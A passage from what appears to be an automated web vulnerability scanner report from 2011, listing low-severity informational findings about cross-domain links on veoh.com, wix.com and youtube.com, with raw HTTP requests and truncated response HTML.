       <a href="http://www.quantcast.com/p-aasG6JkxVvmNA" target="_blank">
           <img src="http://pixel.quantserve.com/pixel/p-aasG6JkxVvmNA.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
       </a>
...[SNIP]...

18.136. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp;rct\\x3dj\\x26amp;sa\\x3dX\\x26amp;ei\\x3digxLTa3XKZOdgQfJltnlDw\\x26amp;sqi\\x3d2\\x26amp;ved\\x3d0CF0QuAIwCQ\\x26amp;q\\x3dsmartdesis\\x26amp;usg\\x3dAFQjCNGfJXOedr8EFUHoDTuNwPlaSxDDIA\\x22\\x3e\\x3cdiv HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Set-Cookie: veohCookie="VisitorUID=B57D97F4-FEFC-1CDA-FD1E-C2AF21F84319&LastUpdate=03/Feb/2011:12:30:37 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:30:37 GMT; Path=/
Date: Thu, 03 Feb 2011 20:30:37 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=80
Content-Length: 134607

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<link href="http://www.veoh.com/veohplayer.swf?permalinkId=v18978294NGnK88j8&amp;player=videodetailsembedded&amp;contentRatingId=1" rel="video_src" type="application/x-shockwave-flash" /><script type="text/javascript" src="http://cdn.taboolasyndication.com/libtrc/veoh/rbox.js?video_id="></script>
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<li id="nav-twitter">
               <a title="Twitter" href="http://www.twitter.com/veoh" target="_blank" onclick="trackClickInGA('/homepage/twitter');"><img border="0" src="http://ll-appserver.veoh.com/images/nav-twitter.png" />
...[SNIP]...
<li id="nav-facebook">
               <a title="Facebook" href="http://www.facebook.com/pages/Veoh/129836657035793" target="_blank" onclick="trackClickInGA('/homepage/facebook');"><img border="0" src="http://ll-appserver.veoh.com/images/nav-facebook.png" />
...[SNIP]...
<div id="contentHolder" class="watchOpened">
                   <script type="text/javascript" src="http://api.conduit.com/ToolbarApi.js"></script>
...[SNIP]...
<!-- qlipso client -->
           <script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296765037"></script>
...[SNIP]...
</span>
       <a class="button sp_button-blue" href="http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash"><span>
...[SNIP]...
<a href="http://www.veoh.com/users/Veoh-Action-Anime">
<img src="http://static.qlipso.com/share/Resources/0/0/10/RoomThumb.10650.2c603d6edb9e44339cf5a82943ef8b04.jpg" width="58px;" height="58px;" class="qlipsoRoomThumb"/>
<div class="qlipsoOnlineStatus">
...[SNIP]...
<a href="http://www.veoh.com/users/Veoh-Horror-Movies">
<img src="http://static.qlipso.com/share/Resources/0/0/10/RoomThumb.10650.9d76b62635aa43948f525b2cc46e8958.jpg" width="58px;" height="58px;" class="qlipsoRoomThumb"/>
<div class="qlipsoOnlineStatus">
...[SNIP]...
<a href="http://www.veoh.com/users/MitchRider">
<img src="http://static.qlipso.com/share/Resources/0/0/10/RoomThumb.10650.1e075a3674f74e27a7cb4808ae42d91f.jpg" width="58px;" height="58px;" class="qlipsoRoomThumb"/>
<div class="qlipsoOnlineStatus">
...[SNIP]...
</a>
           <a href="http://www.facebook.com/share.php?u=http%3A%2F%2Fwww.veoh.com%2Fbrowse%2Fvideos%2Fcategory%2Faction_adventure%2Fwatch%2Fv18978294NGnK88j8" target="_blank" class="icon sp_facebook" title="Share on Facebook"></a>
           <a href="http://www.myspace.com/Modules/PostTo/Pages/?u=http%3A%2F%2Fwww.veoh.com%2Fbrowse%2Fvideos%2Fcategory%2Faction_adventure%2Fwatch%2Fv18978294NGnK88j8&t=Magadheera+SmartDesis.TK.mp4&c=action" class="icon sp_myspace" target="_blank" title="Share on MySpace"></a>
           <a href="http://twitter.com/home?status=Watch: http%3A%2F%2Fwww.veoh.com%2Fbrowse%2Fvideos%2Fcategory%2Faction_adventure%2Fwatch%2Fv18978294NGnK88j8" class="icon sp_twitter" target="_blank" title="Share on Twitter"></a>
...[SNIP]...
<div id="moreShareIcons" class="hide">
               <a href="http://digg.com/submit?url=http%3A%2F%2Fwww.veoh.com%2Fbrowse%2Fvideos%2Fcategory%2Faction_adventure%2Fwatch%2Fv18978294NGnK88j8&title=Magadheera+SmartDesis.TK.mp4&bodytext=action&media=video&topic=movies" target="_blank" title="Digg This" class="icon sp_digg"></a>
               <a href="http://delicious.com/save?url=http%3A%2F%2Fwww.veoh.com%2Fbrowse%2Fvideos%2Fcategory%2Faction_adventure%2Fwatch%2Fv18978294NGnK88j8&title=Magadheera+SmartDesis.TK.mp4&notes=action" target="_blank" title="Save a Bookmark on Delicious" class="icon sp_delicious"></a>
               <a href="http://www.stumbleupon.com/submit?url=http%3A%2F%2Fwww.veoh.com%2Fbrowse%2Fvideos%2Fcategory%2Faction_adventure%2Fwatch%2Fv18978294NGnK88j8&title=Magadheera+SmartDesis.TK.mp4" target="_blank" title="Stumble it" class="icon sp_stumbleupon"></a>
...[SNIP]...
<a href="http://www.veoh.com/users/Veoh-Action-Anime">
<img src="http://static.qlipso.com/share/Resources/0/0/10/RoomThumb.10650.2c603d6edb9e44339cf5a82943ef8b04.jpg" width="58px;" height="58px;" class="qlipsoRoomThumb"/>
<div class="qlipsoOnlineStatus">
...[SNIP]...
<a href="http://www.veoh.com/users/Veoh-Horror-Movies">
<img src="http://static.qlipso.com/share/Resources/0/0/10/RoomThumb.10650.9d76b62635aa43948f525b2cc46e8958.jpg" width="58px;" height="58px;" class="qlipsoRoomThumb"/>
<div class="qlipsoOnlineStatus">
...[SNIP]...
<a href="http://www.veoh.com/users/MitchRider">
<img src="http://static.qlipso.com/share/Resources/0/0/10/RoomThumb.10650.1e075a3674f74e27a7cb4808ae42d91f.jpg" width="58px;" height="58px;" class="qlipsoRoomThumb"/>
<div class="qlipsoOnlineStatus">
...[SNIP]...
<a href="http://www.veoh.com/users/Veoh-Upcoming-Movies">
<img src="http://static.qlipso.com/share/Resources/0/5/193/RoomThumb.5193736.2c5c689b2f5f45368a9547702fc35410.jpg" width="58px;" height="58px;" class="qlipsoRoomThumb"/>
<div class="qlipsoOnlineStatus">
...[SNIP]...
<li><a id="footer-twitter" href="http://www.twitter.com/veoh" title="Twitter">Twitter</a>
...[SNIP]...
<li><a href="http://veoh.tv/ccjjew">Feedback</a>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...
<noscript>
       <a href="http://www.quantcast.com/p-aasG6JkxVvmNA" target="_blank">
           <img src="http://pixel.quantserve.com/pixel/p-aasG6JkxVvmNA.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
       </a>
...[SNIP]...

18.137. http://www.veoh.com/publish/video  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /publish/video

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /publish/video?source=navbar HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:46:40 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=90
Content-Length: 25294

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<li id="nav-twitter">
               <a title="Twitter" href="http://www.twitter.com/veoh" target="_blank" onclick="trackClickInGA('/homepage/twitter');"><img border="0" src="http://ll-appserver.veoh.com/images/nav-twitter.png" />
...[SNIP]...
<li id="nav-facebook">
               <a title="Facebook" href="http://www.facebook.com/pages/Veoh/129836657035793" target="_blank" onclick="trackClickInGA('/homepage/facebook');"><img border="0" src="http://ll-appserver.veoh.com/images/nav-facebook.png" />
...[SNIP]...
<li><a id="footer-twitter" href="http://www.twitter.com/veoh" title="Twitter">Twitter</a>
...[SNIP]...
<li><a href="http://veoh.tv/ccjjew">Feedback</a>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
<noscript>
       <a href="http://www.quantcast.com/p-aasG6JkxVvmNA" target="_blank">
           <img src="http://pixel.quantserve.com/pixel/p-aasG6JkxVvmNA.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
       </a>
...[SNIP]...

18.138. http://www.wix.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wix.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /?utm_campaign=se_thumbshots.com&experiment_id=WB HTTP/1.1
Host: www.wix.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 03 Feb 2011 20:30:52 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: 1-2-HP=1773136778; Domain=wix.com; Expires=Sat, 05-Feb-2011 05:59:59 GMT; Path=/
Set-Cookie: userType=ANONYMOUS; Domain=.wix.com; Expires=Thu, 04-Feb-2016 01:34:42 GMT; Path=/
Set-Cookie: _wixRefX=null-referer; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: _wixRefX=null-referer; Domain=.wix.com; Expires=Tue, 02-Aug-2011 20:30:52 GMT; Path=/
Set-Cookie: _wixCampX=se_thumbshots.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: _wixCampX=se_thumbshots.com; Domain=.wix.com; Expires=Tue, 02-Aug-2011 20:30:52 GMT; Path=/
Set-Cookie: _wixExprX=WB; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: _wixExprX=WB; Domain=.wix.com; Expires=Tue, 02-Aug-2011 20:30:52 GMT; Path=/
Set-Cookie: _wixLndX=6457463; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: _wixLndX=6457463; Domain=.wix.com; Expires=Tue, 02-Aug-2011 20:30:52 GMT; Path=/
Set-Cookie: _wixTSX=1296765052503; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: _wixTSX=1296765052503; Domain=.wix.com; Expires=Tue, 02-Aug-2011 20:30:52 GMT; Path=/
Set-Cookie: _wixUIDX=null-user-id; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: _wixUIDX=null-user-id; Domain=.wix.com; Expires=Tue, 02-Aug-2011 20:30:52 GMT; Path=/
Set-Cookie: _wixCIDX=b24b7eaa-470f-49d3-93b3-5391a2a58446; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: _wixCIDX=b24b7eaa-470f-49d3-93b3-5391a2a58446; Domain=.wix.com; Expires=Tue, 02-Aug-2011 20:30:52 GMT; Path=/
Location: http://www.wix.com
Set-Cookie: hasBeenRedirected=true; Domain=.wix.com; Expires=Thu, 04-Feb-2016 01:34:42 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 26610

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphp
...[SNIP]...
</script>

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=linktree&apiKey=R_8088a4d53e1f7ce1696ebab36accd853"></script>
...[SNIP]...

18.139. http://www.youtube.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?hl=en&tab=w1 HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:31:02 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: VISITOR_INFO1_LIVE=FZaZ02S4c3g; path=/; domain=.youtube.com; expires=Sat, 01-Oct-2011 20:31:02 GMT
Set-Cookie: PREF=f1=50000000; path=/; domain=.youtube.com; expires=Sun, 31-Jan-2021 20:31:02 GMT
Set-Cookie: GEO=0ac3bef9549e0537693aa5a5040a2cc1cwsAAAAzVVOtwdbzTUsQhg==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Connection: close

<!DOCTYPE html>
<html lang="en" dir="ltr" >
<!-- machid: nLThsU052OXJEdFVlejlPay04TThSVTJPX0JrcnNENkw4RWxMVVR1WXR6NTJ4UXVjZUZhZUVn -->
<head>
<script>
var yt = yt || {};

yt.timing
...[SNIP]...
</title>

<link id="www-core-css" rel="stylesheet" href="http://s.ytimg.com/yt/cssbin/www-core-vflAcpcNK.css">


<style type="text/css">
...[SNIP]...
<link rel="search" type="application/opensearchdescription+xml" href="http://www.youtube.com/opensearch?locale=en_US" title="YouTube Video Search">
<link rel="icon" href="//s.ytimg.com/yt/favicon-vflZlzSbU.ico" type="image/x-icon">
<link rel="shortcut icon" href="//s.ytimg.com/yt/favicon-vflZlzSbU.ico" type="image/x-icon">
<link rel="canonical" href="/">
...[SNIP]...
</script>

<script id="www-core-js" src="//s.ytimg.com/yt/jsbin/www-core-vflvTi9ps.js"></script>
...[SNIP]...
<a href="/" title="YouTube home">
<img id="logo" class="master-sprite" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="YouTube home">
</a>
...[SNIP]...
</a>

<a class="start" href="https://www.google.com/accounts/LogoutWarning?continue=http%3A%2F%2Fwww.youtube.com%2Fcreate_account%3Fnext%3D%252F%253Fhl%253Den%2526tab%253Dw1&amp;ltmpl=sso&amp;service=youtube&amp;hl=en_US">Create Account</a><a class="end" href="https://www.google.com/accounts/ServiceLogin?uilel=3&amp;service=youtube&amp;passive=true&amp;continue=http%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26nomobiletemp%3D1%26hl%3Den_US%26next%3D%252F%253Fhl%253Den%2526tab%253Dw1&amp;hl=en_US&amp;ltmpl=sso">Sign In</a>
...[SNIP]...
</span>
<img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" class="master-sprite">
</a>
...[SNIP]...
<div id="ad_creative_1" class="ad-div mastad" style="z-index: 1;">
<iframe id="ad_creative_iframe_1" src="http://ad-g.doubleclick.net/adi/com.ythome/_default;sz=970x250,960x250;klg=en;kt=K;kga=-1;kgg=-1;kcr=us;dc_dedup=1;kmyd=ad_creative_1;tile=1;dcopt=ist;ord=4713973838904810?" height="250" width="970" scrolling="no" frameborder="0" style="z-index: 1" id="homepagetop" onload="yt.www.home.ads.workaroundLoad()" onmouseover="yt.www.home.ads.workaroundIE(this)" onfocus="yt.www.home.ads.workaroundIE(this)"></iframe>
...[SNIP]...
</span>
<a href="https://www.google.com/accounts/ServiceLogin?uilel=3&amp;service=youtube&amp;passive=true&amp;continue=http%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26nomobiletemp%3D1%26hl%3Den_US%26next%3D%252F&amp;hl=en_US&amp;ltmpl=sso">Sign In</a>
...[SNIP]...
<div class="opt-box-top">
<img class="homepage-sprite img-php-opt-box-caret" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" />
</div>
...[SNIP]...
<div class="opt-close opt-close-button" onclick="moduleHelper.closeOptionsPane('REC')"><img class="img-php-close-button" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif"/></div>
...[SNIP]...
<div id="REC-loading-icn" class="opt-loading-icn" style="display: none;">
<img width="16" id="REC-loading-icn-image" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" image="//s.ytimg.com/yt/img/icn_loading_animated-vflff1Mjj.gif">
</div>
...[SNIP]...
<div class="opt-simple-msg">
Want to customize this homepage?

<a href="https://www.google.com/accounts/ServiceLogin?uilel=3&service=youtube&passive=true&continue=http%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26nomobiletemp%3D1%26hl%3Den_US%26next%3D%252F&hl=en_US&ltmpl=sso" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/LoginSuggest/SignIn/EditModuleBox');">Sign In</a> or <a href="https://www.google.com/accounts/LogoutWarning?continue=http%3A%2F%2Fwww.youtube.com%2Fcreate_account&ltmpl=sso&service=youtube&hl=en_US" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/LoginSuggest/SignUp/EditModuleBox');">Sign Up</a>
...[SNIP]...
ointer; display:inline; float: right;" onclick="_hidediv('logged_out_rec_learn_more_box'); return false;" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/Rec_LearnMore_Close');"><img class="img-php-close-button master-sprite" style="background-position: -82px -712px;" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif"/></div>
...[SNIP]...
<div style="color: black; padding-left: 5px; padding-right: 10px; margin-top: 10px;">
Remember, you will get better, more specific, and more consistent recommendations by <a href="https://www.google.com/accounts/ServiceLogin?uilel=3&amp;service=youtube&amp;passive=true&amp;continue=http%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26nomobiletemp%3D1%26hl%3Den_US%26next%3D%252F&amp;hl=en_US&amp;ltmpl=sso">logging in</a> (or <a href="https://www.google.com/accounts/LogoutWarning?continue=http%3A%2F%2Fwww.youtube.com%2Fcreate_account%3Fnext%3D%252F&amp;ltmpl=sso&amp;service=youtube&amp;hl=en_US">signing up</a>
...[SNIP]...
<div class="opt-box-top">
<img class="homepage-sprite img-php-opt-box-caret" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" />
</div>
...[SNIP]...
<div class="opt-close opt-close-button" onclick="moduleHelper.closeOptionsPane('TOP')"><img class="img-php-close-button" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif"/></div>
...[SNIP]...
<div id="TOP-loading-icn" class="opt-loading-icn" style="display: none;">
<img width="16" id="TOP-loading-icn-image" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" image="//s.ytimg.com/yt/img/icn_loading_animated-vflff1Mjj.gif">
</div>
...[SNIP]...
<div class="opt-simple-msg">
Want to customize this homepage?

<a href="https://www.google.com/accounts/ServiceLogin?uilel=3&service=youtube&passive=true&continue=http%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26nomobiletemp%3D1%26hl%3Den_US%26next%3D%252F&hl=en_US&ltmpl=sso" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/LoginSuggest/SignIn/EditModuleBox');">Sign In</a> or <a href="https://www.google.com/accounts/LogoutWarning?continue=http%3A%2F%2Fwww.youtube.com%2Fcreate_account&ltmpl=sso&service=youtube&hl=en_US" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/LoginSuggest/SignUp/EditModuleBox');">Sign Up</a>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" title="The Sloppy Roethlisberger - Epic Meal Time" data-thumb="//i3.ytimg.com/vi/FCxFn3sAw68/default.jpg" alt="Thumbnail" class="" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/TOP/Logged_Out/24');" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" title="Hulk Hogan VS Kim Jong-il - Epic Rap Battles of History 5" data-thumb="//i4.ytimg.com/vi/7rE0-ek6MZA/default.jpg" alt="Thumbnail" class="" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/TOP/Logged_Out/10');" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" title="Zach Wahls Speaks About Family" data-thumb="//i3.ytimg.com/vi/FSQQK2Vuf9Q/default.jpg" alt="Thumbnail" class="" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/TOP/Logged_Out/25');" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" title="3D Maestro" data-thumb="//i2.ytimg.com/vi/uMTvaNomlWY/default.jpg" alt="Thumbnail" class="" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/TOP/Logged_Out/1');" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" title="Falc..o desafia Ronaldinho Ga..cho" data-thumb="//i4.ytimg.com/vi/O6WCnwQjb3E/default.jpg" alt="Thumbnail" class="" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/TOP/Logged_Out/17');" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" title="How to watch 3D videos on YouTube" data-thumb="//i1.ytimg.com/vi/pNuKAaC337U/default.jpg" alt="Thumbnail" class="" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/TOP/Logged_Out/26');" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" title="Making Out FAIL" data-thumb="//i2.ytimg.com/vi/msJrcliQP8s/default.jpg" alt="Thumbnail" class="" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/TOP/Logged_Out/23');" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
